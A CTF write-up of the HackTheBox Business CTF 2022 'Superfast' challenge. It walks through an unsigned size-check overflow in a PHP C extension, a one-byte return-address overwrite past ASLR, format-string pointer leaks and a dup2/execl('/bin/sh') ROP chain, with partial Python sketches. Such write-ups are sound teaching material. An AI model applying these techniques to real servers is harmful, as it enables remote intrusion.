Hey folks. In this write-up, we're going to discuss the Superfast challenge on HackTheBox, which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and build a Return Oriented Programming (ROP) chain. The description of the challenge is:
We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we acquired from a temporarily exposed Git repository several months ago. Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?
I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.
Index
First looks
Finding primitives
Developing the ROP chain
Retrieving the flag
First looks
We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.
In /challenge/start.sh we can see that the challenge code gets bootstrapped using:
We can see that PHP loads php_logger.so as a binary extension for the webserver.
Finding primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.
Analysing index.php
The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.
One of the most important stages of exploit development is building a reproducible environment. Since I want to run GDB on php_logger.so, I will run the challenge without Docker. I can serve index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123'. We can see it succeeds because it returns a 200 status code.
Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.
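Since the exploit payloads later on contain raw bytes, it helps to build the request programmatically instead of with curl. The following is a minimal sketch using only the Python standard library; the helper name build_request is hypothetical, and it assumes the key is sent as a decimal string in the Cmd-Key header, as in the curl example above.

```python
from urllib.parse import quote_from_bytes
from urllib.request import Request

# Local test server from the curl example above.
BASE_URL = "http://127.0.0.1:1337/index.php"


def build_request(cmd: bytes, key: int, base: str = BASE_URL) -> Request:
    """Build (but do not send) a request carrying raw bytes in ?cmd=."""
    if not 0 < key < 256:
        raise ValueError("key must satisfy 0 < key < 256")
    # Percent-encode every byte that is not URL-safe, including NUL bytes.
    url = f"{base}?cmd={quote_from_bytes(cmd, safe='')}"
    return Request(url, headers={"Cmd-Key": str(key)})


req = build_request(b"123", 123)
print(req.full_url)
```

Passing the returned object to urllib.request.urlopen() would actually send it; that step is left out here so the sketch runs without a server.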
Analyzing php_logger.so
We can find the source code of php_logger.so in /src/php_logger.c, which also contains the source code of log_cmd(). We can see that log_cmd() retrieves function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and - if the return is valid - appends to the /tmp/log file.
This function itself looks safe, so the vulnerability must be in decrypt(input, size, key). This function checks if the size of the command is less than the size of the stack buffer. If it is more, it returns; if it is less, it will memcpy() the input into the buffer and XOR the buffer with the key.
We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int, the subtraction is carried out in unsigned arithmetic, which means the result wraps around instead of going negative. For example, (uint)0 - (int)1 would become 2**32-1, instead of -1. A practical example would be the one below. The output of the program is 4294967295 1.
That means that sizeof(buffer) - size > 0 is always true, unless sizeof(buffer) == size. The result is a buffer overflow on the stack, which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.
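To make the wrap-around concrete, here is a small Python sketch that emulates the unsigned subtraction by masking to the register width. BUFFER_SIZE is a hypothetical value chosen for illustration; the real size is defined in php_logger.c.

```python
MASK_32 = 0xFFFFFFFF
MASK_64 = 0xFFFFFFFFFFFFFFFF

# Hypothetical buffer size, only used for illustration.
BUFFER_SIZE = 128


def unsigned_sub(a: int, b: int, mask: int = MASK_64) -> int:
    """Emulate C unsigned subtraction: the result wraps modulo 2**bits."""
    return (a - b) & mask


def size_check_passes(size: int, buffer_size: int = BUFFER_SIZE) -> bool:
    """Model of the flawed check `sizeof(buffer) - size > 0`."""
    return unsigned_sub(buffer_size, size) > 0


print(unsigned_sub(0, 1, MASK_32))  # 4294967295, i.e. 2**32 - 1
for size in (16, 128, 129, 4096):
    print(size, size_check_passes(size))
```

Only the size equal to the buffer size fails the check; every larger size wraps to a huge positive number and passes, which is what lets the memcpy() run past the buffer.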
However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the least significant 12 bits of an address are not randomized, so in principle we can reliably overwrite those 12 bits of the return address. Say our normal return address is 0x555555559a1e; on the next run it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because those are the lowest 12 bits.
Only the lowest 12 bits of the address stay fixed because they are the offset within a page, and the page size is 4096 bytes (2 ** 12). The kernel - the manager of ASLR - maps memory at page granularity, so it can only randomize the page-aligned part of an address.
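The page-offset argument can be checked with a couple of lines of Python. This sketch simply masks the two example addresses from the text with the page size minus one.

```python
PAGE_SIZE = 4096            # 2 ** 12 bytes
PAGE_MASK = PAGE_SIZE - 1   # 0xfff, selects the offset within a page


def page_offset(addr: int) -> int:
    """Return the part of an address that ASLR leaves untouched."""
    return addr & PAGE_MASK


def page_base(addr: int) -> int:
    """Return the page-aligned part, which ASLR randomizes."""
    return addr & ~PAGE_MASK


run_a = 0x555555559A1E
run_b = 0x55555123FA1E
print(hex(page_offset(run_a)), hex(page_offset(run_b)))  # 0xa1e 0xa1e
print(hex(page_base(run_a)), hex(page_base(run_b)))
```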
Sadly, we can only write whole bytes (8 bits) at a time, considering we're working with a char data type. Writing a second byte would also clobber 4 randomized bits, so we can only reliably overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.
In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is 0x1014129. This means our scope of possible return addresses ranges from 0x1014100 to 0x10141ff.
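The single-byte overwrite can be sketched as follows. The helper names are hypothetical, and the sketch assumes that decrypt() XORs every copied byte with the key, so the payload is pre-XORed to make the intended bytes land on the stack.

```python
RET_OFFSET = 0x98  # buffer-to-return-address offset found in Ghidra


def reachable_range(ret_addr: int) -> tuple[int, int]:
    """Addresses reachable by changing only the lowest byte of ret_addr."""
    base = ret_addr & ~0xFF
    return base, base | 0xFF


def partial_overwrite_payload(low_byte: int, key: int) -> bytes:
    """Padding up to the return address plus one byte, pre-XORed with key."""
    if not 0 <= low_byte <= 0xFF:
        raise ValueError("low_byte must fit in one byte")
    raw = b"A" * RET_OFFSET + bytes([low_byte])
    # Assumption: decrypt() XORs each byte with the key after memcpy().
    return bytes(b ^ key for b in raw)


low, high = reachable_range(0x1014129)
print(hex(low), hex(high))  # 0x1014100 0x10141ff
payload = partial_overwrite_payload(0x29, key=1)
print(len(payload))         # 153
```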
The code in our return scope is the following. We can see that decrypt() is called, then print_message(), followed by a number of file I/O functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.
However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.
When I try to fuzz using a script, I receive the following output:
However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak points, we can start a GDB server. On another run we leak 0x7f651305f54041 (the low byte 0x41 appears to be the final 'A' of our input, which leaves the pointer 0x7f651305f540), and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this mapping isn't executable, it's irrelevant for the ROP chain.
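For readers without pwntools at hand, the u64() decoding step can be reproduced with the standard library. This sketch uses a hypothetical helper u64_le and the leaked bytes quoted above.

```python
import struct


def u64_le(data: bytes) -> int:
    """Decode up to 8 bytes as a little-endian unsigned 64-bit integer."""
    if len(data) > 8:
        raise ValueError("expected at most 8 bytes")
    # Pad with NUL bytes on the right, like .ljust(8, b'\x00') in the text.
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]


leak = b"A\x80\xd4\x85T\x81\x7f"
print(hex(u64_le(leak)))  # 0x7f815485d48041
```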
Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:
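Building the format string and splitting the response back into integers can be sketched like this. The function names are hypothetical, and the sample response is made-up illustration data, not an actual leak from the target.

```python
import string

HEX_DIGITS = set(string.hexdigits)


def build_format_string(count: int) -> str:
    """Repeat %llx_ so each leaked 64-bit value is underscore-terminated."""
    return "%llx_" * count


def parse_leaks(body: str) -> list[int]:
    """Turn 'aaa_bbb_ccc_' into a list of integers, skipping non-hex tokens."""
    values = []
    for token in body.split("_"):
        if token and set(token) <= HEX_DIGITS:
            values.append(int(token, 16))
    return values


fmt = build_format_string(9)
print(fmt)

# Made-up response body, only to show the parsing step.
sample = "7ffc1234abcd_0_7f0011223344_"
print([hex(v) for v in parse_leaks(sample)])
```

Each parsed value can then be matched against vmmap output to decide whether it belongs to the stack, php_logger.so or the PHP binary.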
We have the needed primitives, so we can develop the ROP chain.
Developing the ROP chain
Now we can use pwntools' ELF and ROP classes to build ROP chains automatically. Using pwntools' ELF class, we can see that the execl function is present in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:
Leaking the address of the PHP binary and the php_logger.so in memory.
dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable
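As a rough illustration of what such a chain looks like in memory, here is a hand-rolled sketch using only struct. Every offset in HYPOTHETICAL_OFFSETS is a placeholder, not a real gadget or symbol offset from the PHP binary, and it assumes simple pop-register gadgets and a "/bin/sh" string at a known address.

```python
import struct

# Placeholder offsets for illustration only; real values come from the binary.
HYPOTHETICAL_OFFSETS = {
    "pop_rdi": 0x1111,  # pop rdi; ret
    "pop_rsi": 0x2222,  # pop rsi; ret
    "pop_rdx": 0x3333,  # pop rdx; ret
    "dup2": 0x4444,     # dup2@plt
    "execl": 0x5555,    # execl@plt
    "binsh": 0x6666,    # address of a "/bin/sh" string
}


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value, like pwntools' p64()."""
    return struct.pack("<Q", value)


def build_chain(php_base: int, offsets=HYPOTHETICAL_OFFSETS, sock_fd: int = 4) -> bytes:
    """dup2(sock_fd, 0..2) followed by execl("/bin/sh", "/bin/sh", 0)."""
    addr = {name: php_base + off for name, off in offsets.items()}
    chain = b""
    for target_fd in (0, 1, 2):  # stdin, stdout, stderr
        chain += p64(addr["pop_rdi"]) + p64(sock_fd)
        chain += p64(addr["pop_rsi"]) + p64(target_fd)
        chain += p64(addr["dup2"])
    chain += p64(addr["pop_rdi"]) + p64(addr["binsh"])
    chain += p64(addr["pop_rsi"]) + p64(addr["binsh"])
    chain += p64(addr["pop_rdx"]) + p64(0)
    chain += p64(addr["execl"])
    return chain


chain = build_chain(0x555555554000)
print(len(chain))  # 176 bytes
```

In the actual exploit this chain would follow the 0x98 bytes of padding, with the leaked base of the PHP binary passed as php_base.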
We can generate a ROP chain automatically with pwntools:
Which gives the following ROP chain:
As we can see, it does the following:
Retrieving the flag
I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.
Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.